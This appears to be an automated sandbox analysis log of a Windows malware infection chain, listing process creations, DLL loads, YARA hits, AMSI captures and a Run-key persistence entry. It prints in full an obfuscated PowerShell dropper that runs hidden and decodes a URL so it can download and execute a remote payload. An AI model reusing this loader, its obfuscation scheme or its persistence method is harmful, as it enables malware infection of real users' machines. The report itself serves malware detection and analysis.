Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: pstorec.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptbase.dll Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.*/1L source: msiexec.exe, 00000013.00000002.2741454011.0000000002AFA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.*h# source: msiexec.exe, 00000013.00000002.2741454011.0000000002B17000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000005.00000002.2436956991.00000000078E9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbDp source: powershell.exe, 00000005.00000002.2436956991.00000000078E9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: tem.Core.pdb( source: powershell.exe, 00000005.00000002.2436956991.00000000078E9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000005.00000002.2436956991.00000000078C4000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: Yara match File source: 00000005.00000002.2444276578.000000000941D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2444032858.0000000008C20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2430167631.0000000005E7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2286084235.0000014F9006F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Kommodernes)$GloBAl:AgErjOrDeN = [SYsteM.tEXt.ENcodiNg]::AsCiI.GETStRINg($kusKEsLAG)$gLoBaL:teuToNizE=$aGeRJOrdeN.suBstRING($ALlerGists,$tUGTELSEN16)<#Fourteener Forjudges Alabamians
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Bewitchment162 $Senaterne $Velocious), (Hurdis @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Preadmitting190 = [AppDomain]::CurrentDomain.GetAssemblies()
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Bongoes)), $Crossopterygiivredes).DefineDynamicModule($Floragraferede, $false).DefineType($Fjerposes, $dormy, [System.MulticastDelegat
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Kommodernes)$GloBAl:AgErjOrDeN = [SYsteM.tEXt.ENcodiNg]::AsCiI.GETStRINg($kusKEsLAG)$gLoBaL:teuToNizE=$aGeRJOrdeN.suBstRING($ALlerGists,$tUGTELSEN16)<#Fourteener Forjudges Alabamians
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Paremernes duplicature Udvejer Dataservicens Treasury Ostleress Uninterdicted #>;$Cryoscopy='Grusgrav';<#Dubbe Bantustamme Nyvurderende Tripudiate Mitigated #>; function Dark($Misligholdelsers){If ($host.DebuggerEnabled) {$Differentieringens++;}$Sadomasochism=$Cariss+$Misligholdelsers.'Length'-$Differentieringens; for( $Unacute27=4;$Unacute27 -lt $Sadomasochism;$Unacute27+=5){$Unaccommodable=$Unacute27;$Enforth+=$Misligholdelsers[$Unacute27];$Cutireaction='Blomstringstiderne';}$Enforth;}function Nondeclaratively($Budcyklen){ . ($Dolomitternes) ($Budcyklen);}$Skrllede=Dark 'StaiMC clo eftzF stiRagelRi elStyra ogn/Thra ';$Stupiditetens=Dark 'KrypTSvenl PresU ne1 nde2unav ';$Unpliantness=' lus[MashNFldee My T Fal.AnthsD coehistrru dVS stIEngrCBefaeTilgPTortO BogiSangNOpspTMa.iMNonfA awnNSkruASamlgLibeEZygoR lit]Vaga:Sovj:AlecSMyogECuphcP esUGennRDisci C aTSkjuy BasP iggRV.rgo Ga tGonioCam.c.eclOTrevlSvrm= Ven$Net sEndeTconcu.seuptomaiRoveDGoveIFagkT UnmE TraTGastEFravn R.ms Unp ';$Skrllede+=Dark 'Regi5Majo.Mau.0 Opd Simo(Tip WTer iF lgnChrodBusho Priw .orsUnsh j,nsN MolTBuff Fora1Side0Fod ..ast0Ni n;Vilj AnfgW KreieftenMaka6Svir4Unpr;Str, ParxLine6 Uns4.nde;beru beedrAfkavGoat:Gene1 Un 3Sang1 up.Miss0fo m) Mor AandGDiskeRee cturbkMorpo dta/Nive2 Res0Drop1slad0Skuf0Arch1K,nd0.dst1 Ri tetFAeroi ConrStofe ,lifEnteo ,dkxTreu/A,te1V ra3Cod 1 Hdr.Fo r0Etym ';$Signatarmagters=Dark ' reu FyrsBivoe PosRIle - alASneaG WayeIsodN J mTGe e ';$beskftigelsesinteressen=Dark 'Hre hS petTraft nkp Ka,sLoai:Inex/ Co /DowneConivYn leUndesIntaeVerdc TmrrCaroeOlivtPrin.M,timGou aCyl /LokaM,adeigarasRecefAutoo ylbrForlsL.rat,orpa Pina Po e.egil Slfs WifeKbenr RetnReckeRejs. Autp,heesGroum,itr ';$Unacute27mpastoed=Dark 'Volu> Nyt ';$Dolomitternes=Dark 'archiConsEForbX Skr ';$nyhedsbureauernes='Forfatningsdomstol';$Cynography='\Satisfiable.Ins';Nondeclaratively (Dark 'Hort$AmphgSyrilLa gOBo abVaa ASh nL Und:VellsFdsekTestiMassLBys.s We,mSterIStilsstokSHan eSt erGuld1reva8 Rov=Rumi$ FleeGiarNUnsuvCons: efeAT rbPMicrPH lkDSpriAAntiTForsAColi+Unfo$Ges.CFo.lYKam NSta OOp,jgFallR BriA .enpTrasHBarkyHyae ');Nondeclaratively (Dark ' ,ns$LavtgMonsL VinoCharB c aaCatcL D,n:sc,pKSambl regAL ngR ympLSpriAPsy GImmotba.keHortSGdni= par$SavsbMicreDiscSBrackMel FPyr TTilbI,oncGBe oe TimlEnchsBuckEBrneSExosIGaseN,aklTBlgee Ranr R,seChroSUnpesRek,e Eu NDise. DaySFolkpRedelIn biPuckTMed (Rage$PicaUMetaNClamAUdstCPastuA teTAeroE kse2 er7Gt,eMLa,dp.tagAVaans ikoTBarbOPulsEUngrdSamf)Himm ');Nondeclaratively (Dark $Unpliantness);$beskftigelsesinteressen=$Klarlagtes[0];$Kakar=(Dark 'tr.i$Tut g DenlR.adOVrdibCru aWordLs.de:.pkaGSkadROve,uOronnArkidEft V edgOOpfaL.rendFdesE ,roN OmgsPutr= BedNSlamED mpW rad-vapooFeatB IntjP liEKa,scRemstHumi FodbS hiy Ad,SSurrTS.ioESkosmTils. aefNOpbyEWhartLykk. RebW A.se AlbbCommcF rlLAn,eISla,ESam N PieTSeku ');Nondeclaratively ($Kakar);Nondeclaratively (Da
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Paremernes duplicature Udvejer Dataservicens Treasury Ostleress Uninterdicted #>;$Cryoscopy='Grusgrav';<#Dubbe Bantustamme Nyvurderende Tripudiate Mitigated #>; function Dark($Misligholdelsers){If ($host.DebuggerEnabled) {$Differentieringens++;}$Sadomasochism=$Cariss+$Misligholdelsers.'Length'-$Differentieringens; for( $Unacute27=4;$Unacute27 -lt $Sadomasochism;$Unacute27+=5){$Unaccommodable=$Unacute27;$Enforth+=$Misligholdelsers[$Unacute27];$Cutireaction='Blomstringstiderne';}$Enforth;}function Nondeclaratively($Budcyklen){ . ($Dolomitternes) ($Budcyklen);}$Skrllede=Dark 'StaiMC clo eftzF stiRagelRi elStyra ogn/Thra ';$Stupiditetens=Dark 'KrypTSvenl PresU ne1 nde2unav ';$Unpliantness=' lus[MashNFldee My T Fal.AnthsD coehistrru dVS stIEngrCBefaeTilgPTortO BogiSangNOpspTMa.iMNonfA awnNSkruASamlgLibeEZygoR lit]Vaga:Sovj:AlecSMyogECuphcP esUGennRDisci C aTSkjuy BasP iggRV.rgo Ga tGonioCam.c.eclOTrevlSvrm= Ven$Net sEndeTconcu.seuptomaiRoveDGoveIFagkT UnmE TraTGastEFravn R.ms Unp ';$Skrllede+=Dark 'Regi5Majo.Mau.0 Opd Simo(Tip WTer iF lgnChrodBusho Priw .orsUnsh j,nsN MolTBuff Fora1Side0Fod ..ast0Ni n;Vilj AnfgW KreieftenMaka6Svir4Unpr;Str, ParxLine6 Uns4.nde;beru beedrAfkavGoat:Gene1 Un 3Sang1 up.Miss0fo m) Mor AandGDiskeRee cturbkMorpo dta/Nive2 Res0Drop1slad0Skuf0Arch1K,nd0.dst1 Ri tetFAeroi ConrStofe ,lifEnteo ,dkxTreu/A,te1V ra3Cod 1 Hdr.Fo r0Etym ';$Signatarmagters=Dark ' reu FyrsBivoe PosRIle - alASneaG WayeIsodN J mTGe e ';$beskftigelsesinteressen=Dark 'Hre hS petTraft nkp Ka,sLoai:Inex/ Co /DowneConivYn leUndesIntaeVerdc TmrrCaroeOlivtPrin.M,timGou aCyl /LokaM,adeigarasRecefAutoo ylbrForlsL.rat,orpa Pina Po e.egil Slfs WifeKbenr RetnReckeRejs. Autp,heesGroum,itr ';$Unacute27mpastoed=Dark 'Volu> Nyt ';$Dolomitternes=Dark 'archiConsEForbX Skr ';$nyhedsbureauernes='Forfatningsdomstol';$Cynography='\Satisfiable.Ins';Nondeclaratively (Dark 'Hort$AmphgSyrilLa gOBo abVaa ASh nL Und:VellsFdsekTestiMassLBys.s We,mSterIStilsstokSHan eSt erGuld1reva8 Rov=Rumi$ FleeGiarNUnsuvCons: efeAT rbPMicrPH lkDSpriAAntiTForsAColi+Unfo$Ges.CFo.lYKam NSta OOp,jgFallR BriA .enpTrasHBarkyHyae ');Nondeclaratively (Dark ' ,ns$LavtgMonsL VinoCharB c aaCatcL D,n:sc,pKSambl regAL ngR ympLSpriAPsy GImmotba.keHortSGdni= par$SavsbMicreDiscSBrackMel FPyr TTilbI,oncGBe oe TimlEnchsBuckEBrneSExosIGaseN,aklTBlgee Ranr R,seChroSUnpesRek,e Eu NDise. DaySFolkpRedelIn biPuckTMed (Rage$PicaUMetaNClamAUdstCPastuA teTAeroE kse2 er7Gt,eMLa,dp.tagAVaans ikoTBarbOPulsEUngrdSamf)Himm ');Nondeclaratively (Dark $Unpliantness);$beskftigelsesinteressen=$Klarlagtes[0];$Kakar=(Dark 'tr.i$Tut g DenlR.adOVrdibCru aWordLs.de:.pkaGSkadROve,uOronnArkidEft V edgOOpfaL.rendFdesE ,roN OmgsPutr= BedNSlamED mpW rad-vapooFeatB IntjP liEKa,scRemstHumi FodbS hiy Ad,SSurrTS.ioESkosmTils. aefNOpbyEWhartLykk. RebW A.se AlbbCommcF rlLAn,eISla,ESam N PieTSeku ');Nondeclaratively ($Kak
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Paremernes duplicature Udvejer Dataservicens Treasury Ostleress Uninterdicted #>;$Cryoscopy='Grusgrav';<#Dubbe Bantustamme Nyvurderende Tripudiate Mitigated #>; function Dark($Misligholdelsers){If ($host.DebuggerEnabled) {$Differentieringens++;}$Sadomasochism=$Cariss+$Misligholdelsers.'Length'-$Differentieringens; for( $Unacute27=4;$Unacute27 -lt $Sadomasochism;$Unacute27+=5){$Unaccommodable=$Unacute27;$Enforth+=$Misligholdelsers[$Unacute27];$Cutireaction='Blomstringstiderne';}$Enforth;}function Nondeclaratively($Budcyklen){ . ($Dolomitternes) ($Budcyklen);}$Skrllede=Dark 'StaiMC clo eftzF stiRagelRi elStyra ogn/Thra ';$Stupiditetens=Dark 'KrypTSvenl PresU ne1 nde2unav ';$Unpliantness=' lus[MashNFldee My T Fal.AnthsD coehistrru dVS stIEngrCBefaeTilgPTortO BogiSangNOpspTMa.iMNonfA awnNSkruASamlgLibeEZygoR lit]Vaga:Sovj:AlecSMyogECuphcP esUGennRDisci C aTSkjuy BasP iggRV.rgo Ga tGonioCam.c.eclOTrevlSvrm= Ven$Net sEndeTconcu.seuptomaiRoveDGoveIFagkT UnmE TraTGastEFravn R.ms Unp ';$Skrllede+=Dark 'Regi5Majo.Mau.0 Opd Simo(Tip WTer iF lgnChrodBusho Priw .orsUnsh j,nsN MolTBuff Fora1Side0Fod ..ast0Ni n;Vilj AnfgW KreieftenMaka6Svir4Unpr;Str, ParxLine6 Uns4.nde;beru beedrAfkavGoat:Gene1 Un 3Sang1 up.Miss0fo m) Mor AandGDiskeRee cturbkMorpo dta/Nive2 Res0Drop1slad0Skuf0Arch1K,nd0.dst1 Ri tetFAeroi ConrStofe ,lifEnteo ,dkxTreu/A,te1V ra3Cod 1 Hdr.Fo r0Etym ';$Signatarmagters=Dark ' reu FyrsBivoe PosRIle - alASneaG WayeIsodN J mTGe e ';$beskftigelsesinteressen=Dark 'Hre hS petTraft nkp Ka,sLoai:Inex/ Co /DowneConivYn leUndesIntaeVerdc TmrrCaroeOlivtPrin.M,timGou aCyl /LokaM,adeigarasRecefAutoo ylbrForlsL.rat,orpa Pina Po e.egil Slfs WifeKbenr RetnReckeRejs. Autp,heesGroum,itr ';$Unacute27mpastoed=Dark 'Volu> Nyt ';$Dolomitternes=Dark 'archiConsEForbX Skr ';$nyhedsbureauernes='Forfatningsdomstol';$Cynography='\Satisfiable.Ins';Nondeclaratively (Dark 'Hort$AmphgSyrilLa gOBo abVaa ASh nL Und:VellsFdsekTestiMassLBys.s We,mSterIStilsstokSHan eSt erGuld1reva8 Rov=Rumi$ FleeGiarNUnsuvCons: efeAT rbPMicrPH lkDSpriAAntiTForsAColi+Unfo$Ges.CFo.lYKam NSta OOp,jgFallR BriA .enpTrasHBarkyHyae ');Nondeclaratively (Dark ' ,ns$LavtgMonsL VinoCharB c aaCatcL D,n:sc,pKSambl regAL ngR ympLSpriAPsy GImmotba.keHortSGdni= par$SavsbMicreDiscSBrackMel FPyr TTilbI,oncGBe oe TimlEnchsBuckEBrneSExosIGaseN,aklTBlgee Ranr R,seChroSUnpesRek,e Eu NDise. DaySFolkpRedelIn biPuckTMed (Rage$PicaUMetaNClamAUdstCPastuA teTAeroE kse2 er7Gt,eMLa,dp.tagAVaans ikoTBarbOPulsEUngrdSamf)Himm ');Nondeclaratively (Dark $Unpliantness);$beskftigelsesinteressen=$Klarlagtes[0];$Kakar=(Dark 'tr.i$Tut g DenlR.adOVrdibCru aWordLs.de:.pkaGSkadROve,uOronnArkidEft V edgOOpfaL.rendFdesE ,roN OmgsPutr= BedNSlamED mpW rad-vapooFeatB IntjP liEKa,scRemstHumi FodbS hiy Ad,SSurrTS.ioESkosmTils. aefNOpbyEWhartLykk. RebW A.se AlbbCommcF rlLAn,eISla,ESam N PieTSeku ');Nondeclaratively ($Kakar);Nondeclaratively (Da Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 18_2_004044A4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD347A52D3 pushad ; iretd 2_2_00007FFD347A5329
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_04C642BD push ebx; ret 5_2_04C642DA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_04C6CCB8 pushfd ; ret 5_2_04C6CCB9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_04C61C01 pushad ; iretd 5_2_04C61C51
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07ADCE17 pushfd ; iretd 5_2_07ADCE2D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07ADEDDE push ds; ret 5_2_07ADEDDF
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_0044693D push ecx; ret 18_2_0044694D
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_0044DB70 push eax; ret 18_2_0044DB84
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_0044DB70 push eax; ret 18_2_0044DBAC
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_00451D54 push eax; ret 18_2_00451D61
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 19_2_0044B090 push eax; ret 19_2_0044B0A4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 19_2_0044B090 push eax; ret 19_2_0044B0CC
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 19_2_00451D34 push eax; ret 19_2_00451D41
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 19_2_00444E71 push ecx; ret 19_2_00444E81
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 20_2_00414060 push eax; ret 20_2_00414074
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 20_2_00414060 push eax; ret 20_2_0041409C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 20_2_00414039 push ecx; ret 20_2_00414049
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 20_2_004164EB push 0000006Ah; retf 20_2_004165C4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 20_2_00416553 push 0000006Ah; retf 20_2_004165C4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 20_2_00416555 push 0000006Ah; retf 20_2_004165C4
Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Udstiller35 Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Udstiller35 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 19_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 19_2_004047CB
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
